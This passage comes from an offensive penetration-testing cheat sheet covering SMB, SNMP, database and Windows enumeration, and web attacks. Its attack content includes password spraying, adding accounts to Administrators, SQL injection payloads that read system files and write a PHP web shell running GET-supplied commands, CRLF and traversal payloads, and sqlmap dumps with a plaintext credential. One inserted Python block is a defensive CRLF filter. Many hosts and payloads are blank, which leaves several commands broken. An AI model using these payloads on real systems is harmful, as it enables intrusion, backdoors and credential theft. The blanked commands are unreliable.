netexec ldap -u '' -p '' --gmsa-convert-id
netexec ldap -u '' -p '' --gmsa-decrypt-lsa
netexec ldap -u '' -p '' --find-delegation
netexec ldap -u '' -p '' -M get-network -o ALL=true
netexec ldap -u '' -p '' --bloodhound -ns -c All
netexec ldap -u '' --use-kcache --bloodhound --dns-tcp --dns-server -c All
netexec winrm /24 -u '' -p '' -d .
netexec winrm -u /t -p '' -d ''
netexec winrm -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/
netexec winrm -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --ignore-pw-decoding
netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --no-bruteforce --continue-on-success
netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --shares
netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --shares --continue
netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --pass-pol
netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --lusers
netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --sam
netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --wdigest enable
netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ -x 'quser'
netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ -x 'net user Administrator /domain' --exec-method smbexec
```

Password spraying with a user file and a password file is lockout-prone: check the password policy (`--pass-pol`) first and use `--no-bruteforce` to pair the lists line by line instead of trying every combination.

### NFS **[`^ back to top ^`](#overview)**

Check which directories are exported via NFS.
```
apt install nfs-common
/sbin/showmount --exports
```

Mount an export to a local folder:

```
mount -t nfs :/mnt/backups /mnt/
```

### Samba **[`^ back to top ^`](#overview)**

Connect anonymously:

```
smbclient ///anonymous
```

List the shares and the access level a user has on them:

```
smbmap -H -u "USERNAME" -p "PASSWORD"
```

Connect as a user:

```
smbclient ///SHARE_NAME -U USERNAME
Password for [WORKGROUP\USERNAME]:
```

Download a whole share recursively:

```
smbget -R smb:///anonymous
```

### SNMP **[`^ back to top ^`](#overview)**

Walk the MIB tree via `snmpwalk`:

```
snmpwalk -c COMMUNITY -v VERSION target_ip
snmpwalk -c public -v1
snmpwalk -c public -v2c
```

Walk a specific MIB node:

```
snmpwalk -c community -v version Target IP MIB Node
# Example: USER ACCOUNTS = 1.3.6.1.4.1.77.1.2.25
snmpwalk -c public -v1 192.168.25.77 1.3.6.1.4.1.77.1.2.25
```

snmp-check:

```
snmp-check -t target_IP
snmp-check -t TARGET -c COMMUNITY
snmp-check -t 172.20.10.5
snmp-check -t 172.20.10.5 -c public
```

Nmap SNMP enumeration (`snmp-info` also reports the SNMPv3 engine ID and boot/uptime details):

```
nmap -sV -p 161 --script=snmp-info 172.20.10.0/24
```

### testssl.sh **[`^ back to top ^`](#overview)**

Installation:

```
apt update && apt -y install testssl.sh
```

Test a server's TLS configuration (protocols, ciphers, certificate, known vulnerabilities) and write an HTML report:

```
testssl --openssl /usr/bin/openssl -oH testssl_results.html somesite.com
```

`testssl.sh` also checks for known SSL/TLS vulnerabilities (Heartbleed, ROBOT, POODLE, etc.), but it only tests for them; it does not exploit them.

### OpenSSL **[`^ back to top ^`](#overview)**

Check web servers for the TLS heartbeat extension. `-tlsextdebug` is required: without it `s_client` never prints the extension list and the `grep` matches nothing.

```
for subdomain in $(cat subdomains_live.txt); do res=$(echo "Q" | openssl s_client -connect "${subdomain}:443" -tlsextdebug 2>&1 | grep 'server extension "heartbeat" (id=15)'); if [[ ! -z $res ]]; then echo "${subdomain}"; fi; done | tee openssl_heartbleed_results.txt
for subdomain in $(cat subdomains_live_short_https.txt); do res=$(echo "Q" | openssl s_client -connect "${subdomain}" -tlsextdebug 2>&1 | grep 'server extension "heartbeat" (id=15)'); if [[ ! -z $res ]]; then echo "${subdomain}"; fi; done | tee openssl_heartbleed_results.txt
```

A hit only means the server advertises the heartbeat extension, which is a precondition for Heartbleed, not proof of it; confirm with `nmap --script ssl-heartbleed` (see the NSE examples above) or `testssl.sh` before reporting.

### keytool **[`^ back to top ^`](#overview)**

Grab the SSL/TLS certificate chain and decode it with OpenSSL:

```
keytool -printcert -rfc -sslserver somesite.com > keytool_results.txt
openssl x509 -noout -text -in keytool_results.txt
```

Use [uncover](#uncover) with Shodan and Censys SSL/TLS dorks to find more in-scope subdomains from certificate data.

### uncover **[`^ back to top ^`](#overview)**

Installation:

```
go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest
```

Set your API keys in `/root/.config/uncover/provider-config.yaml` as follows:

```
shodan:
  - SHODAN_API_KEY
censys:
  - CENSYS_API_ID:CENSYS_API_SECRET
```

Gather IPs based on the SSL/TLS certificate subject common name (CN):

```
uncover -json -o uncover_cert_shodan_results.json -l 100 -e shodan -q 'ssl.cert.subject.CN:"*.somedomain.com"'
uncover -json -o uncover_cert_censys_results.json -l 100 -e censys -q 'cert.parsed.subject.common_name:"*.somedomain.com"'
```

### Databases **[`^ back to top ^`](#overview)**

#### MYSQL **[`^ back to top ^`](#overview)**

**Try remote root access (default installs may have an empty root password):**

```
mysql -h target_ip -u root -p
```

**Login:**

```
mysql -u user -h localhost -D database -p
```

**Pass the password on the command line (no prompt; note that it ends up in the shell history):**

```
mysql -u user -h localhost -D database --password='passwd'
```

**Execute a SQL command:**

```
mysql -u user -h localhost -D database --password='passwd' -e 'command'
```

**Enumeration commands for privileges:**

```
SHOW GRANTS FOR CURRENT_USER();
SHOW GRANTS FOR 'root'@'localhost';
SELECT * FROM mysql.user;
# All databases
SHOW DATABASES;
# Use a database
USE databasename;
# All tables
SHOW TABLES;
# All data from a table
SELECT * FROM tablename;
# For better (vertical) output, end the statement with `\G` instead of `;`.
# All columns/info of a table
DESCRIBE tablename;
```

**Queries:**

```
# Get version
version()
@@version
# Current user
user()
# Current DB
database()
# User privileges
SELECT super_priv FROM mysql.user
UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges-- -
# All databases
group_concat(SCHEMA_NAME,"\r\n") FROM information_schema.SCHEMATA
# All tables from a DB
group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'db_name'
UNION SELECT table_name,NULL FROM information_schema.tables
# All columns for all tables in a database
group_concat(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'db_name'
# Get table and column names at once
group_concat(TABLE_NAME,' : ',COLUMN_NAME,'\r\n') FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'db'
# All columns for one table
group_concat(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'db_name' AND TABLE_NAME = 'table_name'
# Dump rows from a table
group_concat(role,' : ',name,' : ',email,' : ',password,'\r\n') FROM users
# List password hashes
SELECT host, user, password FROM mysql.user;
```

**Read files:**

```
union select 1,2,3,LOAD_FILE('/etc/passwd')-- -
Union Select TO_base64(LOAD_FILE("/var/www/html/index.php"))-- -
```

**Writing files.** Check the `secure_file_priv` value first: an empty string means file reads/writes are unrestricted, a directory restricts them to that path, and `NULL` disables them entirely. The MySQL process also needs write permission on the target directory.

```
UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
SELECT * from users INTO OUTFILE '/tmp/credentials';
select 'file written successfully!'
into outfile '/var/www/html/proof.txt'
```

**PHP code** (write a web shell into the document root; the PHP payload goes in the selected string):

```
union select "",'', "", "" into outfile '/var/www/html/shell.php'-- -
```

**Attack types:**

```
# Union Select
## Detect the number of columns using `order by` (increase until the query errors)
' order by 1-- -
## Detect the number of columns using a UNION injection
cn' UNION select 1,2,3-- -
union select 1,2,3,version()-- -

# Error Based
## MariaDB payloads
and extractvalue(1,concat(0x7e,version()))-- -
AND (extractvalue(1,concat(0x7e,version())))
and updatexml(1,concat(0x0a,version()),null)-- -
and (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a)-- -
## Get the output in pieces
and extractvalue(0,concat(0,(select (select mid(,1,99)) from . limit 0,1)))
# Or
and extractvalue(0,concat(0,substring((select from . limit 0,1) from 1)))
IudGPHd9pEKiee9MkJ7ggPD89q3Yn…
# We got only the first 32 chars of the output, because the XPATH error message
# produced by `extractvalue()` is truncated to 32 characters!
echo -n 'IudGPHd9pEKiee9MkJ7ggPD89q3Y' | wc -c
# Now change the start index to 1+29 = 30 (29 because the … takes 3 and 32-3=29)
and extractvalue(0x7e,concat(0x7e,substring((select from . limit 0,1) from 30)))
# "ndctnPeRQOmS2PQ7QIrbJEomFVG6" and the next index is 1+29+29 = 59
# When you get fewer than 32 chars back, the output is finished; move on to the next row with limit 1,1, then limit 2,1, and so on

# Blind SQLi
## Time-based: the response takes 5 seconds if the injection works
and sleep(5)#
## Boolean-based: count X up until the page changes
# length(database())=X
and length(database())=4#
```

#### MSSQL **[`^ back to top ^`](#overview)**

Information gathering:

```
nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip
```

Connect to the MSSQL database with Windows authentication and list a directory via `xp_dirtree`:

```
impacket-mssqlclient -p 1433 -dc-ip DOMAIN/Operator:operator@ -windows-auth
SQL (MANAGER\Operator  guest@master)> xp_dirtree "C:\inetpub\wwwroot\",0,1;
```

Get the version:

```
-q "SELECT @@Version"
```

Get the current database:

```
-q "SELECT DB_NAME() AS [Current Database]"
```

Get all database names:

```
-q "SELECT name FROM sys.databases"
-q "Select name from sysdatabases"
-q "SELECT name FROM master.dbo.sysdatabases"
```

Get all table names:

```
-q "SELECT table_name from core_app.INFORMATION_SCHEMA.TABLES"
```

Get all content from a table:

```
-q "SELECT * from [core_app].[dbo].tbl_users"
```

#### PostgreSQL **[`^ back to top ^`](#overview)**

Connect with a connection string or with separate flags (`-W` forces the password prompt):

```
psql "postgresql://$DB_USER:$DB_PWD@$DB_SERVER/$DB_NAME"
psql -U postgres -W -h localhost -d cozyhosting
psql "postgresql://postgres:PASSWORD@localhost:5432/cozyhosting"
```

Example session: list databases (`\list`), switch database (`\c`), list relations (`\d`) and dump a table:

```
psql -U postgres -W -h localhost -d cozyhosting
Password:
\list
                                  List of databases
    Name     |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges
-------------+----------+----------+-------------+-------------+-----------------------
 cozyhosting | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 postgres    | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 template0   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
             |          |          |             |             | postgres=CTc/postgres
 template1   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
             |          |          |             |             | postgres=CTc/postgres
(4 rows)

\c cozyhosting
Password:
You are now connected to database "cozyhosting" as user "postgres".

\d
              List of relations
 Schema |     Name     |   Type   |  Owner
--------+--------------+----------+----------
 public | hosts        | table    | postgres
 public | hosts_id_seq | sequence | postgres
 public | users        | table    | postgres
(3 rows)

SELECT * FROM users;
   name    |                           password                           | role
-----------+--------------------------------------------------------------+-------
 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
(2 rows)
```

#### sqlite **[`^ back to top ^`](#overview)**

Connect to a `.sqlite` database and dump its schema and data:

```
sqlite3 1.sqlite
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE users (username TEXT PRIMARY KEY NOT NULL, password TEXT NOT NULL);
INSERT INTO users VALUES('emily','PASSWORD');
CREATE TABLE images (url TEXT PRIMARY KEY NOT NULL, original TEXT NOT NULL, username TEXT NOT NULL);
COMMIT;
```

List the tables and select from one:

```
sqlite> .tables
sqlite> select * from accounts_customuser;
```

### Windows OS Enumeration **[`^ back to top ^`](#overview)**

#### Windows Basic Commands **[`^ back to top ^`](#overview)**

```
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
```

Users:

```
net users
```

Info about a user:

```
net user USER
```

Change a user's password:

```
net user USER NEW_PASSWORD
```

Add a user:

```
net users USER /add
```

Add a user to a group (`net group` manages domain groups, `net localgroup` local groups; the RDP group is the local group "Remote Desktop Users"):

```
net group Administrators USER /add
net localgroup Administrators USER /add
net localgroup "Remote Desktop Users" USER /add
```

Groups:

```
net groups
net localgroups
```

Whoami:

```
whoami
whoami /all
```

IP / interfaces:

```
ipconfig /all
```

Routes:

```
route print
```

ARP table:

```
arp -a
```

List processes:

```
tasklist
```

Query the current drives on the system:

```
fsutil fsinfo drives
```

List the active sessions (console and RDP), including which users are logged on:

```
qwinsta
```

#### nbtstat **[`^ back to top ^`](#overview)**

Query the NetBIOS name table of a remote host:

```
nbtstat -a
nbtstat -a 10.10.1.100
```

List what is shared there:

```
net view Target_IP
net view 10.10.1.100
```

Map a share to a drive letter and explore it:

```
net use < A_drive > \\Target_IP\SHARE_NAME
net use K: \\10.10.1.100\Dados
```

#### winfo **[`^ back to top ^`](#overview)**

Null session:

```
winfo < IP_Address > (-v verbose) (-n Null Session)
```

winfo – enumerate users:

```
winfo < IP_Address > -u
```

#### nbtscan **[`^ back to top ^`](#overview)**

```
nbtscan -r 172.16.1.0/24
```

#### smblcient **[`^ back to top ^`](#overview)**

Null session:

```
smbclient -L //172.168.1.5 -N
```

No password but with a user:

```
smbclient -L //172.168.1.5 -N -U Administrator
smbclient //172.168.1.5/path -N
smbclient //172.168.1.5/path -U DOMAIN\\administrator
```

#### rpcclient **[`^ back to top ^`](#overview)**

```
rpcclient -U "" -N 172.16.1.5
rpcclient -U "Administrator" -N 172.16.1.5
```

Commands:

* `enumdomusers`
* `netshareenum`
* `netshareenumall`
* `querydominfo`
* `lookupname root`
* `queryuser john`

Connect over RPC without a username and password (null session) and enumerate privileges:

```
rpcclient --user="" --command=enumprivs -N 172.20.10.5
```

Same, but prompting for a password (set `--user` to the account name):

```
rpcclient --user="" --command=enumprivs 172.20.10.5
```

#### enum4linux **[`^ back to top ^`](#overview)**

All info:

```
enum4linux -a 172.16.1.5
```

With a user and a blank password:

```
enum4linux -a -u administrator -p "" 172.16.1.5
```

## 3. Vulnerability Assesment/Exploiting **[`^ back to top ^`](#overview)**

### 3.1 Useful Websites **[`^ back to top ^`](#overview)**

* [cvedetails.com](https://www.cvedetails.com) – CVE security vulnerability database.
* [exploit-db.com](https://www.exploit-db.com) – archive of public exploits.
* [rapid7.com/db/](https://www.rapid7.com/db/) – Rapid7 vulnerability & exploit database.
* [sploitus.com](https://sploitus.com/) – exploit and hacker tool search engine.
* [sploitify.haxx.it](https://sploitify.haxx.it/) – exploit index.
* [cxsecurity.com](https://cxsecurity.com/wlb) – bugtraq and exploit database.
* [hakluke/weaponised-XSS-payloads](https://github.com/hakluke/weaponised-XSS-payloads) – collection of weaponized XSS payloads.
* [namecheap.com](https://www.namecheap.com) – buy domains for cheap.
* [streaak/keyhacks](https://github.com/streaak/keyhacks) – validate API keys.
* [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) – list of useful payloads and bypasses.
* [jwt.io](https://jwt.io) – decode, verify, and generate JWTs.
* [portswigger.net/web-security](https://portswigger.net/web-security) – Web Security Academy learning materials.
* [ired.team](https://www.ired.team/) – notes on Red Teaming and Weaponization.
* [bigiamchallenge.com](https://bigiamchallenge.com) – nice AWS CTF.
* [f-secure.com/text-message-checker](https://www.f-secure.com/en/text-message-checker) – SMS phishing checker.
* [f-secure.com/online-shopping-checker](https://www.f-secure.com/en/online-shopping-checker) – online shopping scam checker.
* [browserling.com](https://www.browserling.com/) – cross-browser testing sandbox.
* [extsentry.github.io](https://extsentry.github.io/) – Chrome extension vulnerability assessment.
* [useragentstring.com](https://www.useragentstring.com/) – detailed User-Agent parsing.

### Collaborator Servers
**[`^ back to top ^`](#overview)**

Used when trying to exploit an open redirect, blind cross-site scripting (XSS), out-of-band DNS and HTTP interactions, etc.
* [interactsh.com](https://app.interactsh.com)
* [Burp Collaborator](https://portswigger.net/burp/documentation/collaborator)
* [canarytokens.org](https://canarytokens.org/generate)
* [webhook.site](https://webhook.site)

### Subdomain Takeover
**[`^ back to top ^`](#overview)**

Biggest cloud service providers:

* [aws.amazon.com](https://aws.amazon.com)
* [azure.microsoft.com](https://azure.microsoft.com)
* [cloud.google.com](https://cloud.google.com)
* [wordpress.com](https://wordpress.com)
* [shopify.com](https://www.shopify.com)

### Search Exploits and Scanners
**[`^ back to top ^`](#overview)**

```
apt install docker.io
docker run -d -p 443:443 --name openvas mikesplain/openvas
```

This command will both pull the Docker image and then run the container. It may take a few minutes for the container to fully set up and begin running. Once it is complete you can navigate to `https://127.0.0.1` in your preferred browser and OpenVAS will be set up and ready to go! Below are the default credentials to access OpenVAS/GVM:
```
Username: admin
Password: admin
```

Search for exploits for a service:
```
searchsploit squirrelmail 1.4
```

### Subzy
**[`^ back to top ^`](#overview)**

Installation:
```
go install -v github.com/lukasikic/subzy@latest
```

Check for subdomain takeover:
```
subzy -concurrency 100 -timeout 3 -targets subdomains_errors.txt | tee subzy_results.txt
```

### subjack
**[`^ back to top ^`](#overview)**

Installation:
```
go install -v github.com/haccer/subjack@latest
```

Check for subdomain takeover:
```
subjack -v -o subjack_results.json -t 100 -timeout 3 -a -m -w subdomains_errors.txt
```

### Nikto
**[`^ back to top ^`](#overview)**

Scan a web server:
```
nikto -output nikto_results.txt -h somesite.com -p 80
```

### WPScan
**[`^ back to top ^`](#overview)**

Scan a WordPress website:
```
wpscan -o wpscan_results.txt --url somesite.com
```

### Joomla
**[`^ back to top ^`](#overview)**

```
joomscan --url http://
```

### Nuclei
**[`^ back to top ^`](#overview)**

Installation and updating:
```
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
nuclei -up && nuclei -ut
```

Vulnerability scan, all templates:
```
nuclei -c 500 -o nuclei_results.txt -l subdomains_live_long_2xx_4xx.txt
cat nuclei_results.txt | grep -Po '(?<=\ ).+' | sort -uf > nuclei_sorted_results.txt
```

Only subdomain takeover templates:
```
nuclei -c 500 -t takeovers -o nuclei_takeover_results.txt -l subdomains_live.txt
```

### Arjun
**[`^ back to top ^`](#overview)**

Discover request parameters:
```
arjun --stable -oT arjun_results.txt -oJ arjun_results.json -T 3 -t 5 --passive -m GET -u https://somesite.com
arjun --stable -oT arjun_results.txt -oJ arjun_results.json -T 3 -t 5 --passive -m GET -i subdomains_live_long_2xx.txt
```

### Insecure Direct Object Reference (IDOR)
**[`^ back to top ^`](#overview)**

First, try to simply change one value to another, e.g., change `victim@gmail.com` to `hacker@gmail.com`, change some ID from `1` to `2`, etc. Lower-numbered IDs are likely to belong to higher-privileged accounts or roles.
Second, try parameter pollution:
```
"email":"hacker@gmail.com,victim@gmail.com"
"email":"hacker@gmail.com victim@gmail.com"
"email":"hacker@gmail.com","email":"victim@gmail.com"
"email":"victim@gmail.com,hacker@gmail.com"
"email":"victim@gmail.com hacker@gmail.com"
"email":"victim@gmail.com","email":"hacker@gmail.com"
"email":("hacker@gmail.com","victim@gmail.com")
"email":["hacker@gmail.com","victim@gmail.com"]
"email":{"hacker@gmail.com","victim@gmail.com"}
"email":("victim@gmail.com","hacker@gmail.com")
"email":["victim@gmail.com","hacker@gmail.com"]
"email":{"victim@gmail.com","hacker@gmail.com"}
email=hacker%40gmail.com,victim%40gmail.com
email=hacker%40gmail.com%20victim%40gmail.com
email=hacker%40gmail.com&email=victim%40gmail.com
email[]=hacker%40gmail.com&email[]=victim%40gmail.com
email=victim%40gmail.com,hacker%40gmail.com
email=victim%40gmail.com%20hacker%40gmail.com
email=victim%40gmail.com&email=hacker%40gmail.com
email[]=victim%40gmail.com&email[]=hacker%40gmail.com
```

To generate the above output, run [param_pollution.py](./scripts/param_pollution.py):
```
python3 param_pollution.py -n email -i victim@gmail.com -t hacker@gmail.com
```

### HTTP Response Splitting
**[`^ back to top ^`](#overview)**

Also known as CRLF injection. CRLF refers to carriage return (`ASCII 13`, `\r`) and line feed (`ASCII 10`, `\n`). URL-encoded, `\r` becomes `%0D` and `\n` becomes `%0A`. A CRLF in a user-controlled value that is echoed into a response header lets the attacker terminate that header and append headers of their own.

Fixate a session cookie:
```
somesite.com/redirect.asp?origin=somesite.com%0D%0ASet-Cookie:%20ASPSESSION=123456789
```

Open redirect:
```
somesite.com/home.php?marketing=winter%0D%0ALocation:%20https%3A%2F%2Fgithub.com
```

Session fixation and open redirection are two of many techniques used in combination with HTTP response splitting. Search the Internet for more techniques.
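A server-side check for the header-injection class described above, added here as an example and not part of the cheat sheet: it rejects raw or percent-encoded CR/LF (including the double-encoded form) before a user-controlled value reaches a `Location` or `Set-Cookie` header, and restricts redirects to an allow-list. Function names, the allow-list host and the sample inputs are constructed.

```python
"""Reject header-terminating characters before a value reaches a response header.

Added example for the HTTP response splitting section; not part of the Fox
cheat sheet. Function names, the allow-list and the sample inputs are constructed.
"""
from __future__ import annotations

from urllib.parse import unquote, urlsplit

# CR, LF and NUL end a header line (or the whole header block) on most HTTP
# stacks; a user-supplied value containing any of them can inject new headers.
_FORBIDDEN = frozenset("\r\n\0")


def fully_decoded(value: str, rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (capped at `rounds`).

    One round turns %0D%0A into CR LF; a second round also catches the
    double-encoded %250D%250A form that only becomes CR LF after a downstream
    component decodes it again.
    """
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def header_value_is_safe(value: str) -> bool:
    """True only if no decoding of `value` contains CR, LF or NUL."""
    return not any(ch in _FORBIDDEN for ch in fully_decoded(value))


def safe_redirect_target(user_supplied: str, allowed_hosts: frozenset[str]) -> str | None:
    """Build a Location value from user input, or return None if it must be rejected.

    Rejects response splitting (CR/LF in any encoding) and open redirects
    (host not on the allow-list). The CR/LF check runs before urlsplit,
    because urlsplit silently strips CR/LF and would hide the injection.
    """
    if not header_value_is_safe(user_supplied):
        return None
    decoded = fully_decoded(user_supplied)
    # Accept a bare host name or a full URL; force https either way.
    candidate = decoded if "://" in decoded else "https://" + decoded
    parts = urlsplit(candidate)
    if parts.scheme != "https" or parts.hostname not in allowed_hosts:
        return None
    return parts.geturl()


ALLOWED_HOSTS = frozenset({"somesite.com"})  # constructed allow-list for the demo

# The two payloads from the section above, plus the benign value they imitate.
SAMPLES = {
    "somesite.com": "https://somesite.com",
    "somesite.com%0D%0ASet-Cookie:%20ASPSESSION=123456789": None,  # session fixation
    "winter%0D%0ALocation:%20https%3A%2F%2Fgithub.com": None,      # open redirect
}

if __name__ == "__main__":
    for raw, expected in SAMPLES.items():
        result = safe_redirect_target(raw, ALLOWED_HOSTS)
        print(f"{raw!r:60} -> {result!r}")
        assert result == expected
```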
### Cross-Site Scripting (XSS)
**[`^ back to top ^`](#overview)**

Simple cross-site scripting (XSS) payloads:
```
```

Hosting JavaScript on [Pastebin](https://pastebin.com) won't work because Pastebin always returns the `text/plain` content type.

Find out more about reflected and stored cross-site scripting (XSS) attacks, as well as cross-site request forgery (XSRF/CSRF) attacks, in the project at [ivan-sincek/xss-catcher](https://github.com/ivan-sincek/xss-catcher).

Valid RFC emails with embedded XSS:
```
user+()@somedomain.com
user@somedomain().com
""@somedomain.com
```

### SQL Injection
**[`^ back to top ^`](#overview)**

Boolean-based SQLi:
```
' OR 1=1--
' OR 1=2--
```

Union-based SQLi:
```
' UNION SELECT 1,2,3,4--
' UNION SELECT NULL,NULL,NULL,NULL--
' UNION SELECT 1,concat_ws('|',database(),current_user(),version()),3,4--
' UNION SELECT 1,concat_ws('|',table_schema,table_name,column_name,data_type,character_maximum_length),3,4 FROM information_schema.columns--
' UNION SELECT 1,load_file('..\\..\\apache\\conf\\httpd.conf'),3,4--
```

If using, e.g., `1,2,3,4` does not work, try `NULL,NULL,NULL,NULL` instead (`NULL` is compatible with every column type).

Use union-based SQLi only when you are able to use the same communication channel to both launch the attack and gather the results. The goal is to determine the exact number of columns in the SQL query and to figure out which of them are shown back to the user. Another way to determine the exact number of columns is to use, e.g., `' ORDER BY 1-- `, where `1` is the column number used for sorting, incrementing it by one on each try until the query errors out.
Time-based SQLi:
```
' AND (SELECT 1 FROM (SELECT sleep(2)) test)--
' AND (SELECT 1 FROM (SELECT CASE user() WHEN 'root@127.0.0.1' THEN sleep(2) ELSE sleep(0) END) test)--
' AND (SELECT 1 FROM (SELECT CASE substring(current_user(),1,1) WHEN 'r' THEN sleep(2) ELSE sleep(0) END) test)--
' AND (SELECT CASE substring(password,1,1) WHEN '$' THEN sleep(2) ELSE sleep(0) END FROM users WHERE id = 1)--
' AND IF(version() LIKE '5%',sleep(2),sleep(0))--
```

Use time-based SQLi when you are not able to see the results.

Check for existence/correctness:
```
' AND (SELECT 'exists' FROM users) = 'exists
' AND (SELECT 'exists' FROM users WHERE username = 'administrator') = 'exists
' AND (SELECT 'correct' FROM users WHERE username = 'administrator' AND length(password) < 8 ) = 'correct
' AND (SELECT CASE substring(password,1,1) WHEN '$' THEN to_char(1/0) ELSE 'correct' END FROM users WHERE username = 'administrator') = 'correct
'||(SELECT CASE substring(password,1,1) WHEN '$' THEN to_char(1/0) ELSE '' END FROM users WHERE username = 'administrator')||'
```

Inject a [simple PHP web shell](https://github.com/kraloveckey/ghostpack-binaries/blob/main/php-reverse-shell/src/web/simple_php_web_shell_get.php) based on an HTTP GET request:
```
' UNION SELECT '', '', '', '' INTO DUMPFILE '..\\..\\htdocs\\backdoor.php'--
' UNION SELECT '', '', '', '0){$o=@shell_exec("($_GET[$p]) 2>&1");if($o===false){$o="ERROR: The function might be disabled.";}else{$o=str_replace("<","<",$o);$o=str_replace(">",">",$o);}} ?>Simple PHP Web Shell
' INTO DUMPFILE '..\\..\\htdocs\\backdoor.php'--
```

### sqlmap
**[`^ back to top ^`](#overview)**

Inject SQL code into request parameters:
```
sqlmap -a -u "somesite.com/index.php?username=test&password=test"
sqlmap -a -u somesite.com/index.php --data "username=test&password=test"
sqlmap -a -u somesite.com/index.php --data "username=test&password=test" -p password
```

Check the site for SQL injection via the `list[fullordering]` parameter using the most aggressive settings, and if a vulnerability is found, extract the list of databases:
```
sqlmap -u "http:///index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
```

Check for SQL injection in `nagios`:
```
sqlmap -u "https:////nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=1ec86e6d63a7db533923217f3db57a35a244e800" --level 5 --risk 3 -p id
```

Dump the Nagios database:
```shell
sqlmap -u "https:////nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https:///nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi --dump
```

| Option | Description |
| --- | --- |
| -u | Target URL |
| -H | Extra HTTP header |
| --data | Data string to be sent through POST |
| --cookie | HTTP Cookie header value |
| --proxy | Use a proxy to connect to the target URL (protocol://host:port) |
| -p | Testable parameter(s) |
| --level | Level of tests to perform (1-5, default: 1) |
| --risk | Risk of tests to perform (1-3, default: 1) |
| -a | Retrieve everything |
| -b | Retrieve DBMS banner |
| --dump-all | Dump all DBMS databases tables entries |
| --os-shell | Prompt for an interactive operating system shell |
| --os-pwn | Prompt for an OOB shell, Meterpreter, or VNC |
| --sqlmap-shell | Prompt for an interactive sqlmap shell |
| --wizard | Simple wizard interface for beginner users |
| --dbms | Force the back-end DBMS to the provided value |

### dotdotpwn
**[`^ back to top ^`](#overview)**

Traverse a path (e.g., `somesite.com/../../../etc/passwd`):
```
dotdotpwn -q -m http -S -o windows -f /windows/win.ini -k mci -h somesite.com
dotdotpwn -q -m http -o unix -f /etc/passwd -k root -h somesite.com
dotdotpwn -q -m http-url -o unix -f /etc/hosts -k localhost -u 'https://somesite.com/index.php?file=TRAVERSAL'
```

Try to prepend a protocol such as `file://`, `gopher://`, `dict://`, `php://`, `jar://`, `ftp://`, `tftp://`, etc., to the file path; e.g., `file://TRAVERSAL`.

Check some additional directory traversal tips at [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings). Credits to the author!

| Option | Description |
| --- | --- |
| -m | Module (http, http-url, ftp, tftp payload, stdout) |
| -h | Hostname |
| -O | Operating System detection for intelligent fuzzing (nmap) |
| -o | Operating System type if known ("windows", "unix", or "generic") |
| -d | Depth of traversals (default: 6) |
| -f | Specific filename (default: according to OS detected) |
| -S | Use SSL for HTTP and Payload module (not needed for http-url) |
| -u | URL with the part to be fuzzed marked as TRAVERSAL |
| -k | Text pattern to match in the response |
| -p | Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword |
| -x | Port to connect (default: HTTP=80; FTP=21; TFTP=69) |
| -U | Username (default: 'anonymous') |
| -P | Password (default: 'dot(at)dot.pwn') |
| -M | HTTP Method to use when using the 'http' module (GET, POST, HEAD, COPY, MOVE, default: GET) |
| -b | Break after the first vulnerability is found |
| -C | Continue if no data was received from host |

### Web Shells
**[`^ back to top ^`](#overview)**

Find out more about PHP shells in the project at [ghostpack-binaries/php-reverse-shell](https://github.com/ghostpack-binaries/php-reverse-shell).

